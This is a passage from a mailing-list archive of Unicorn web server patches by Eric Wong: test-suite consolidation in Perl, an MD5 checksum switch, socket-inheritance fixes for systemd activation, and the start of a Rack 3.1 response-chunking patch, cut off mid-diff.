--- a/t/integration.t
+++ b/t/integration.t
@@ -13,8 +13,16 @@ my $t0 = time;
 my $conf = "$tmpdir/u.conf.rb";
 open my $conf_fh, '>', $conf;
 $conf_fh->autoflush(1);
+my $u1 = "$tmpdir/u1";
+print $conf_fh <<EOM;
+early_hints true
+listen "$u1"
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
+my $fifo = "$tmpdir/fifo";
+POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
@@ -102,6 +110,26 @@ $c = tcp_start($srv, 'GET /nil-header-value HTTP/1.0');
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
+my $ck_early_hints = sub {
+	my ($note) = @_;
+	$c = unix_start($u1, 'GET /early_hints_rack2 HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 103\b!, 'got 103 for rack 2 value');
+	is_deeply(['link: r', 'link: 2'], $hdr, 'rack 2 hints match '.$note);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'got 200 afterwards');
+	is(readline($c), 'String', 'early hints used a String for rack 2');
+
+	$c = unix_start($u1, 'GET /early_hints_rack3 HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 103\b!, 'got 103 for rack 3');
+	is_deeply(['link: r', 'link: 3'], $hdr, 'rack 3 hints match '.$note);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'got 200 afterwards');
+	is(readline($c), 'Array', 'early hints used a String for rack 3');
+};
+$ck_early_hints->('ccc off'); # we'll retest later
+
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
 	$c = tcp_start($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
@@ -154,6 +182,7 @@ if ('bad requests') {
 # input tests
 my ($blob_size, $blob_hash);
 SKIP: {
+	skip 'SKIP_EXPENSIVE on', 1 if $ENV{SKIP_EXPENSIVE};
 	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
@@ -232,16 +261,24 @@ SKIP: {
 
 # SIGHUP-able stuff goes here
 
+if ('check_client_connection') {
+	print $conf_fh <<EOM; # appending to existing
+check_client_connection true
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	$ar->do_kill('HUP');
+	open my $fifo_fh, '<', $fifo;
+	my $wpid = readline($fifo_fh);
+	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	$ck_early_hints->('ccc on');
+}
+
 if ('max_header_len internal API') {
 	undef $c;
 	my $req = 'GET / HTTP/1.0';
 	my $len = length($req."\r\n\r\n");
-	my $fifo = "$tmpdir/fifo";
-	POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
-	print $conf_fh <<EOM;
+	print $conf_fh <<EOM; # appending to existing
 Unicorn::HttpParser.max_header_len = $len
-listen "$host_port" # TODO: remove this requirement for SIGHUP
-after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
 EOM
 	$ar->do_kill('HUP');
 	open my $fifo_fh, '<', $fifo;

[-- Attachment #20: 0019-test_server-drop-early_hints-test.patch --]
[-- Type: text/x-diff, Size: 1737 bytes --]

From 3e6bc9fb589fd88469349a38a77704c3333623e0 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:48 +0000
Subject: [PATCH 19/23] test_server: drop early_hints test

t/integration.t already is more complete in that it tests
both Rack 2 and 3 along with both possible values of
check_client_connection.
---
 test/unit/test_server.rb | 31 -------------------------------
 1 file changed, 31 deletions(-)

diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index fe98fcc..0a710d1 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -23,17 +23,6 @@ def call(env)
   end
 end
 
-class TestEarlyHintsHandler
-  def call(env)
-    while env['rack.input'].read(4096)
-    end
-    env['rack.early_hints'].call(
-      "Link" => "</style.css>; rel=preload; as=style\n</script.js>; rel=preload"
-    )
-    [200, { 'content-type' => 'text/plain' }, ['hello!\n']]
-  end
-end
-
 class TestRackAfterReply
   def initialize
     @called = false
@@ -112,26 +101,6 @@ def test_preload_app_config
     tmp.close!
   end
 
-  def test_early_hints
-    teardown
-    redirect_test_io do
-      @server = HttpServer.new(TestEarlyHintsHandler.new,
-                               :listeners => [ "127.0.0.1:#@port"],
-                               :early_hints => true)
-      @server.start
-    end
-
-    sock = tcp_socket('127.0.0.1', @port)
-    sock.syswrite("GET / HTTP/1.0\r\n\r\n")
-
-    responses = sock.read(4096)
-    assert_match %r{\AHTTP/1.[01] 103\b}, responses
-    assert_match %r{^Link: </style\.css>}, responses
-    assert_match %r{^Link: </script\.js>}, responses
-
-    assert_match %r{^HTTP/1.[01] 200\b}, responses
-  end
-
   def test_after_reply
     teardown
 

[-- Attachment #21: 0020-t-integration.t-switch-PUT-tests-to-MD5-reuse-buffer.patch --]
[-- Type: text/x-diff, Size: 3740 bytes --]

From cb826915cdd1881cbcfc1fb4e645d26244dfda71 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:49 +0000
Subject: [PATCH 20/23] t/integration.t: switch PUT tests to MD5, reuse buffers

MD5 is faster, and these tests aren't meant to be secure,
they're just for checking for data corruption.
Furthermore, Content-MD5 is a supported HTTP trailer and
we can verify that here to obsolete other tests.

Furthermore, we can reuse buffers on env['rack.input'].read
calls to avoid malloc(3) and GC overhead.

Combined, these give roughly a 3% speedup for t/integration.t
on my system.
---
 t/integration.ru   | 20 +++++++++++++++-----
 t/integration.t    |  5 ++---
 t/preread_input.ru | 17 ++++++++++++-----
 3 files changed, 29 insertions(+), 13 deletions(-)

diff --git a/t/integration.ru b/t/integration.ru
index dab384d..086126a 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -55,8 +55,8 @@ def env_dump(env)
 def rack_input_tests(env)
   return [ 100, {}, [] ] if /\A100-continue\z/i =~ env['HTTP_EXPECT']
   cap = 16384
-  require 'digest/sha1'
-  digest = Digest::SHA1.new
+  require 'digest/md5'
+  dig = Digest::MD5.new
   input = env['rack.input']
   case env['PATH_INFO']
   when '/rack_input/size_first'; input.size
@@ -68,11 +68,21 @@ def rack_input_tests(env)
   if buf = input.read(rand(cap))
     begin
       raise "#{buf.size} > #{cap}" if buf.size > cap
-      digest.update(buf)
+      dig.update(buf)
     end while input.read(rand(cap), buf)
+    buf.clear # remove this call if Ruby ever gets escape analysis
   end
-  [ 200, {'content-length' => '40', 'content-type' => 'text/plain'},
-    [ digest.hexdigest ] ]
+  h = { 'content-type' => 'text/plain' }
+  if env['HTTP_TRAILER'] =~ /\bContent-MD5\b/i
+    cmd5_b64 = env['HTTP_CONTENT_MD5'] or return [500, {}, ['No Content-MD5']]
+    cmd5_bin = cmd5_b64.unpack('m')[0]
+    if cmd5_bin != dig.digest
+      h['content-length'] = cmd5_b64.size.to_s
+      return [ 500, h, [ cmd5_b64 ] ]
+    end
+  end
+  h['content-length'] = '32'
+  [ 200, h, [ dig.hexdigest ] ]
 end
 
 run(lambda do |env|
diff --git a/t/integration.t b/t/integration.t
index 8433497..38a9675 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -27,7 +27,6 @@ my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
 		my $bs = $opt{bs} // 16384;
-		require Digest::MD5;
 		my $dig = Digest::MD5->new;
 		print $out <<EOM;
 PUT $path HTTP/1.1\r
@@ -186,8 +185,8 @@ SKIP: {
 	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
-	require Digest::SHA;
-	$blob_hash = Digest::SHA->new(1)->addfile($rh)->hexdigest;
+	require Digest::MD5;
+	$blob_hash = Digest::MD5->new->addfile($rh)->hexdigest;
 
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
diff --git a/t/preread_input.ru b/t/preread_input.ru
index f0a1748..18af221 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,15 +1,22 @@
 #\-E none
-require 'digest/sha1'
+require 'digest/md5'
 require 'unicorn/preread_input'
 use Unicorn::PrereadInput
 nr = 0
 run lambda { |env|
   $stderr.write "app dispatch: #{nr += 1}\n"
   input = env["rack.input"]
-  dig = Digest::SHA1.new
-  while buf = input.read(16384)
-    dig.update(buf)
+  dig = Digest::MD5.new
+  if buf = input.read(16384)
+    begin
+      dig.update(buf)
+    end while input.read(16384, buf)
+    buf.clear # remove this call if Ruby ever gets escape analysis
+  end
+  if env['HTTP_TRAILER'] =~ /\bContent-MD5\b/i
+    cmd5_b64 = env['HTTP_CONTENT_MD5'] or return [500, {}, ['No Content-MD5']]
+    cmd5_bin = cmd5_b64.unpack('m')[0]
+    return [500, {}, [ cmd5_b64 ] ] if cmd5_bin != dig.digest
   end
-
   [ 200, {}, [ dig.hexdigest ] ]
 }

[-- Attachment #22: 0021-tests-move-test_upload.rb-tests-to-t-integration.t.patch --]
[-- Type: text/x-diff, Size: 12280 bytes --]

From 181e4b5b6339fc5e9c3ad7d3690b736f6bd038aa Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:50 +0000
Subject: [PATCH 21/23] tests: move test_upload.rb tests to t/integration.t

The overread tests are ported over, and checksumming alone
is enough to guard against data corruption.

Randomizing the size of `read' calls on the client side will
shake out any boundary bugs on the server side.
---
 t/integration.t          |  32 ++++-
 test/unit/test_upload.rb | 301 ---------------------------------------
 2 files changed, 27 insertions(+), 306 deletions(-)
 delete mode 100644 test/unit/test_upload.rb

diff --git a/t/integration.t b/t/integration.t
index 38a9675..a568758 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -26,7 +26,6 @@ POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
-		my $bs = $opt{bs} // 16384;
 		my $dig = Digest::MD5->new;
 		print $out <<EOM;
 PUT $path HTTP/1.1\r
@@ -36,7 +35,7 @@ Trailer: Content-MD5\r
 EOM
 		my ($buf, $r);
 		while (1) {
-			$r = read($in, $buf, $bs);
+			$r = read($in, $buf, 999 + int(rand(0xffff)));
 			last if $r == 0;
 			printf $out "%x\r\n", length($buf);
 			print $out $buf, "\r\n";
@@ -46,15 +45,15 @@ EOM
 	},
 	identity => sub {
 		my ($in, $out, $path, %opt) = @_;
-		my $bs = $opt{bs} // 16384;
 		my $clen = $opt{-s} // -s $in;
 		print $out <<EOM;
 PUT $path HTTP/1.0\r
 Content-Length: $clen\r
 \r
 EOM
-		my ($buf, $r, $len);
+		my ($buf, $r, $len, $bs);
 		while ($clen) {
+			$bs = 999 + int(rand(0xffff));
 			$len = $clen > $bs ? $bs : $clen;
 			$r = read($in, $buf, $len);
 			die 'premature EOF' if $r == 0;
@@ -192,8 +191,10 @@ SKIP: {
 		my ($sub, $path, %opt) = @_;
 		seek($rh, 0, SEEK_SET);
 		$c = tcp_start($srv);
-		$c->autoflush(0);
+		$c->autoflush($opt{sync} // 0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
+		defined($opt{overwrite}) and
+			print { $c } ('x' x $opt{overwrite});
 		$c->flush or die $!;
 		($status, $hdr) = slurp_hdr($c);
 		is(readline($c), $blob_hash, "$sub $path");
@@ -205,6 +206,27 @@ SKIP: {
 	$ck_hash->('chunked_md5', '/rack_input/size_first');
 	$ck_hash->('chunked_md5', '/rack_input/rewind_first');
 
+	$ck_hash->('identity', '/rack_input', -s => $blob_size, sync => 1);
+	$ck_hash->('chunked_md5', '/rack_input', sync => 1);
+
+	# ensure small overwrites don't get checksummed
+	$ck_hash->('identity', '/rack_input', -s => $blob_size,
+			overwrite => 1); # one extra byte
+
+	# excessive overwrite truncated
+	$c = tcp_start($srv);
+	$c->autoflush(0);
+	print $c "PUT /rack_input HTTP/1.0\r\nContent-Length: 1\r\n\r\n";
+	if (1) {
+		local $SIG{PIPE} = 'IGNORE';
+		my $buf = "\0" x 8192;
+		my $n = 0;
+		my $end = time + 5;
+		$! = 0;
+		while (print $c $buf and time < $end) { ++$n }
+		ok($!, 'overwrite truncated') or diag "n=$n err=$! ".time;
+	}
+	undef $c;
 
 	$curl // skip 'no curl found in PATH', 1;
 
diff --git a/test/unit/test_upload.rb b/test/unit/test_upload.rb
deleted file mode 100644
index 76e6c1c..0000000
--- a/test/unit/test_upload.rb
+++ /dev/null
@@ -1,301 +0,0 @@
-# -*- encoding: binary -*-
-
-# Copyright (c) 2009 Eric Wong
-require './test/test_helper'
-require 'digest/md5'
-
-include Unicorn
-
-class UploadTest < Test::Unit::TestCase
-
-  def setup
-    @addr = ENV['UNICORN_TEST_ADDR'] || '127.0.0.1'
-    @port = unused_port
-    @hdr = {'Content-Type' => 'text/plain', 'Content-Length' => '0'}
-    @bs = 4096
-    @count = 256
-    @server = nil
-
-    # we want random binary data to test 1.9 encoding-aware IO craziness
-    @random = File.open('/dev/urandom','rb')
-    @sha1 = Digest::SHA1.new
-    @sha1_app = lambda do |env|
-      input = env['rack.input']
-      resp = {}
-
-      @sha1.reset
-      while buf = input.read(@bs)
-        @sha1.update(buf)
-      end
-      resp[:sha1] = @sha1.hexdigest
-
-      # rewind and read again
-      input.rewind
-      @sha1.reset
-      while buf = input.read(@bs)
-        @sha1.update(buf)
-      end
-
-      if resp[:sha1] == @sha1.hexdigest
-        resp[:sysread_read_byte_match] = true
-      end
-
-      if expect_size = env['HTTP_X_EXPECT_SIZE']
-        if expect_size.to_i == input.size
-          resp[:expect_size_match] = true
-        end
-      end
-      resp[:size] = input.size
-      resp[:content_md5] = env['HTTP_CONTENT_MD5']
-
-      [ 200, @hdr.merge({'X-Resp' => resp.inspect}), [] ]
-    end
-  end
-
-  def teardown
-    redirect_test_io { @server.stop(false) } if @server
-    @random.close
-    reset_sig_handlers
-  end
-
-  def test_put
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n")
-    @count.times do |i|
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      sock.syswrite(buf)
-    end
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_content_md5
-    md5 = Digest::MD5.new
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    sock.syswrite("PUT / HTTP/1.0\r\nTransfer-Encoding: chunked\r\n" \
-                  "Trailer: Content-MD5\r\n\r\n")
-    @count.times do |i|
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      md5.update(buf)
-      sock.syswrite("#{'%x' % buf.size}\r\n")
-      sock.syswrite(buf << "\r\n")
-    end
-    sock.syswrite("0\r\n")
-
-    content_md5 = [ md5.digest! ].pack('m').strip.freeze
-    sock.syswrite("Content-MD5: #{content_md5}\r\n\r\n")
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-    assert_equal content_md5, resp[:content_md5]
-  end
-
-  def test_put_trickle_small
-    @count, @bs = 2, 128
-    start_server(@sha1_app)
-    assert_equal 256, length
-    sock = tcp_socket(@addr, @port)
-    hdr = "PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n"
-    @count.times do
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      hdr << buf
-      sock.syswrite(hdr)
-      hdr = ''
-      sleep 0.6
-    end
-    read = sock.read.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal length, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_keepalive_truncates_small_overwrite
-    start_server(@sha1_app)
-    sock = tcp_socket(@addr, @port)
-    to_upload = length + 1
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{to_upload}\r\n\r\n")
-    @count.times do
-      buf = @random.sysread(@bs)
-      @sha1.update(buf)
-      sock.syswrite(buf)
-    end
-    sock.syswrite('12345') # write 4 bytes more than we expected
-    @sha1.update('1')
-
-    buf = sock.readpartial(4096)
-    while buf !~ /\r\n\r\n/
-      buf << sock.readpartial(4096)
-    end
-    read = buf.split(/\r\n/)
-    assert_equal "HTTP/1.1 200 OK", read[0]
-    resp = eval(read.grep(/^X-Resp: /).first.sub!(/X-Resp: /, ''))
-    assert_equal to_upload, resp[:size]
-    assert_equal @sha1.hexdigest, resp[:sha1]
-  end
-
-  def test_put_excessive_overwrite_closed
-    tmp = Tempfile.new('overwrite_check')
-    tmp.sync = true
-    start_server(lambda { |env|
-      nr = 0
-      while buf = env['rack.input'].read(65536)
-        nr += buf.size
-      end
-      tmp.write(nr.to_s)
-      [ 200, @hdr, [] ]
-    })
-    sock = tcp_socket(@addr, @port)
-    buf = ' ' * @bs
-    sock.syswrite("PUT / HTTP/1.0\r\nContent-Length: #{length}\r\n\r\n")
-
-    @count.times { sock.syswrite(buf) }
-    assert_raise(Errno::ECONNRESET, Errno::EPIPE) do
-      ::Unicorn::Const::CHUNK_SIZE.times { sock.syswrite(buf) }
-    end
-    sock.gets
-    tmp.rewind
-    assert_equal length, tmp.read.to_i
-  end
-
-  # Despite reading numerous articles and inspecting the 1.9.1-p0 C
-  # source, Eric Wong will never trust that we're always handling
-  # encoding-aware IO objects correctly.  Thus this test uses shell
-  # utilities that should always operate on files/sockets on a
-  # byte-level.
-  def test_uncomfortable_with_onenine_encodings
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=#{@bs}", "count=#{@count}"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -isSfN -T#{tmp.path} http://#@addr:#@port/`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-
-    # small StringIO path
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=1024", "count=1"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -isSfN -T#{tmp.path} http://#@addr:#@port/`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-  end
-
-  def test_chunked_upload_via_curl
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=#{@bs}", "count=#{@count}"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    cmd = "curl -H 'X-Expect-Size: #{tmp.size}' --tcp-nodelay \
-           -isSf --no-buffer -T- " \
-          "http://#@addr:#@port/"
-    resp = Tempfile.new('resp')
-    resp.sync = true
-
-    rd, wr = IO.pipe.each do |io|
-      io.sync = io.close_on_exec = true
-    end
-    pid = spawn(*cmd, { 0 => rd, 1 => resp })
-    rd.close
-
-    tmp.rewind
-    @count.times { |i|
-      wr.write(tmp.read(@bs))
-      sleep(rand / 10) if 0 == i % 8
-    }
-    wr.close
-    pid, status = Process.waitpid2(pid)
-
-    resp.rewind
-    resp = resp.read
-    assert status.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-    assert_match(/expect_size_match/, resp)
-  end
-
-  def test_curl_chunked_small
-    # POSIX doesn't require all of these to be present on a system
-    which('curl') or return
-    which('sha1sum') or return
-    which('dd') or return
-
-    start_server(@sha1_app)
-
-    tmp = Tempfile.new('dd_dest')
-    # small StringIO path
-    assert(system("dd", "if=#{@random.path}", "of=#{tmp.path}",
-                        "bs=1024", "count=1"),
-           "dd #@random to #{tmp}")
-    sha1_re = %r!\b([a-f0-9]{40})\b!
-    sha1_out = `sha1sum #{tmp.path}`
-    assert $?.success?, 'sha1sum ran OK'
-
-    assert_match(sha1_re, sha1_out)
-    sha1 = sha1_re.match(sha1_out)[1]
-    resp = `curl -H 'X-Expect-Size: #{tmp.size}' --tcp-nodelay \
-            -isSf --no-buffer -T- http://#@addr:#@port/ < #{tmp.path}`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-    assert_match(/expect_size_match/, resp)
-  end
-
-  private
-
-  def length
-    @bs * @count
-  end
-
-  def start_server(app)
-    redirect_test_io do
-      @server = HttpServer.new(app, :listeners => [ "#{@addr}:#{@port}" ] )
-      @server.start
-    end
-  end
-
-end

[-- Attachment #23: 0022-drop-redundant-IO-close_on_exec-false-calls.patch --]
[-- Type: text/x-diff, Size: 891 bytes --]

From 841b9e756beb1aa00d0f89097a808adcbbf45397 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:51 +0000
Subject: [PATCH 22/23] drop redundant IO#close_on_exec=false calls

Passing the `{ FD => IO }' mapping to #spawn or #exec already
ensures Ruby will clear FD_CLOEXEC on these FDs before execve(2).
---
 lib/unicorn/http_server.rb | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 348e745..dd92b38 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -472,10 +472,7 @@ def worker_spawn(worker)
 
   def listener_sockets
     listener_fds = {}
-    LISTENERS.each do |sock|
-      sock.close_on_exec = false
-      listener_fds[sock.fileno] = sock
-    end
+    LISTENERS.each { |sock| listener_fds[sock.fileno] = sock }
     listener_fds
   end
 

[-- Attachment #24: 0023-LISTEN_FDS-inherited-sockets-are-immortal-across-SIG.patch --]
[-- Type: text/x-diff, Size: 3229 bytes --]

From 6ff8785c9277c5978e6dc01cb1b3da25d6bae2db Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:52 +0000
Subject: [PATCH 23/23] LISTEN_FDS-inherited sockets are immortal across SIGHUP

When using systemd-style socket activation, consider the
inherited socket immortal and do not drop it on SIGHUP.
This means configs w/o any `listen' directives at all can
continue to work after SIGHUP.

I only noticed this while writing some tests in Perl 5 and
the test suite is two lines shorter to test this feature :>
---
 lib/unicorn/http_server.rb  | 7 ++++++-
 t/client_body_buffer_size.t | 1 -
 t/integration.t             | 1 -
 3 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index dd92b38..f1b4a54 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -77,6 +77,7 @@ def initialize(app, options = {})
     options[:use_defaults] = true
     self.config = Unicorn::Configurator.new(options)
     self.listener_opts = {}
+    @immortal = [] # immortal inherited sockets from systemd
 
     # We use @self_pipe differently in the master and worker processes:
     #
@@ -158,6 +159,7 @@ def listeners=(listeners)
     end
     set_names = listener_names(listeners)
     dead_names.concat(cur_names - set_names).uniq!
+    dead_names -= @immortal.map { |io| sock_name(io) }
 
     LISTENERS.delete_if do |io|
       if dead_names.include?(sock_name(io))
@@ -807,17 +809,20 @@ def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
     # before they become Kgio::UNIXServer or Kgio::TCPServer
     inherited = ENV['UNICORN_FD'].to_s.split(',')
+    immortal = []
 
     # emulate sd_listen_fds() for systemd
     sd_pid, sd_fds = ENV.values_at('LISTEN_PID', 'LISTEN_FDS')
     if sd_pid.to_i == $$ # n.b. $$ can never be zero
       # 3 = SD_LISTEN_FDS_START
-      inherited.concat((3...(3 + sd_fds.to_i)).to_a)
+      immortal = (3...(3 + sd_fds.to_i)).to_a
+      inherited.concat(immortal)
     end
     # to ease debugging, we will not unset LISTEN_PID and LISTEN_FDS
 
     inherited.map! do |fd|
       io = Socket.for_fd(fd.to_i)
+      @immortal << io if immortal.include?(fd)
       io.autoclose = false
       io = server_cast(io)
       set_server_sockopt(io, listener_opts[sock_name(io)])
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
index b1a99f3..3067f28 100644
--- a/t/client_body_buffer_size.t
+++ b/t/client_body_buffer_size.t
@@ -36,7 +36,6 @@ POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 seek($conf_fh, 0, SEEK_SET);
 truncate($conf_fh, 0);
 print $conf_fh <<EOM;
-listen "$host_port" # TODO: remove this requirement for SIGHUP
 after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
 EOM
 $ar->do_kill('HUP');
diff --git a/t/integration.t b/t/integration.t
index a568758..bb2ab51 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -17,7 +17,6 @@ my $u1 = "$tmpdir/u1";
 print $conf_fh <<EOM;
 early_hints true
 listen "$u1"
-listen "$host_port" # TODO: remove this requirement for SIGHUP
 EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');

^ permalink raw reply related	[relevance 1%]

* [PATCH v2] chunk unterminated HTTP/1.1 responses for Rack 3.1
  @ 2023-06-05  9:12  3%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-06-05  9:12 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: unicorn-public

Jeremy Evans <code@jeremyevans.net> wrote:
> We deprecated Rack::Chunked in Rack 3.0 and plan to remove it in Rack
> 3.1. I agree it would be best to deal with this now, I just wasn't sure
> how you wanted to handle it.  Your patch below to deal with it at the
> server level looks good, though it doesn't appear to remove the Chunked
> usage at line 69 of unicorn.rb.  I recommend that also be removed.

OK.  Also added HEAD and STATUS_WITH_NO_ENTITY_BODY checks...

No tests, yet; they'll be in Perl 5.  (I started rewriting a bunch
of tests in Perl5 last year since tests are where Ruby's yearly
breaking changes are most unacceptable to me).

No trailers for responses yet, either; I didn't realize Rack::Chunked
added special support for that in 2020.

I care deeply about trailers in requests, but never used them
for responses.

--------8<-------
Subject: [PATCH v2] chunk unterminated HTTP/1.1 responses for Rack 3.1

Rack::Chunked will be gone in Rack 3.1, so provide a
non-middleware fallback which takes advantage of IO#write
supporting multiple arguments in Ruby 2.5+.

We still need to support Ruby 2.4, at least, since Rack 3.0
does.  So a new (GC-unfriendly) Unicorn::WriteSplat module now
exists for Ruby <= 2.4 users.
---
  v2: remove Rack::Chunk load attempt
      fix arity check for Ruby <= 2.4
      update docs + examples
Interdiff:
  diff --git a/Documentation/unicorn.1 b/Documentation/unicorn.1
  index d76d40f..b2c5e70 100644
  --- a/Documentation/unicorn.1
  +++ b/Documentation/unicorn.1
  @@ -176,7 +176,7 @@ As of Unicorn 0.94.0, RACK_ENV is exported as a process\-wide environment
   variable as well.  While not current a part of the Rack specification as
   of Rack 1.0.1, this has become a de facto standard in the Rack world.
   .PP
  -Note the Rack::ContentLength and Rack::Chunked middlewares are also
  +Note the Rack::ContentLength middleware is also
   loaded by "deployment" and "development", but no other values of
   RACK_ENV.  If needed, they must be individually specified in the
   RACKUP_FILE, some frameworks do not require them.
  diff --git a/examples/echo.ru b/examples/echo.ru
  index 14908c5..e982180 100644
  --- a/examples/echo.ru
  +++ b/examples/echo.ru
  @@ -19,7 +19,6 @@ def each(&block)
   
   end
   
  -use Rack::Chunked
   run lambda { |env|
     /\A100-continue\z/i =~ env['HTTP_EXPECT'] and return [100, {}, []]
     [ 200, { 'Content-Type' => 'application/octet-stream' },
  diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
  index c339024..afdf680 100644
  --- a/ext/unicorn_http/unicorn_http.rl
  +++ b/ext/unicorn_http/unicorn_http.rl
  @@ -28,11 +28,15 @@ void init_unicorn_httpdate(void);
   #define UH_FL_TO_CLEAR 0x200
   #define UH_FL_RESSTART 0x400 /* for check_client_connection */
   #define UH_FL_HIJACK 0x800
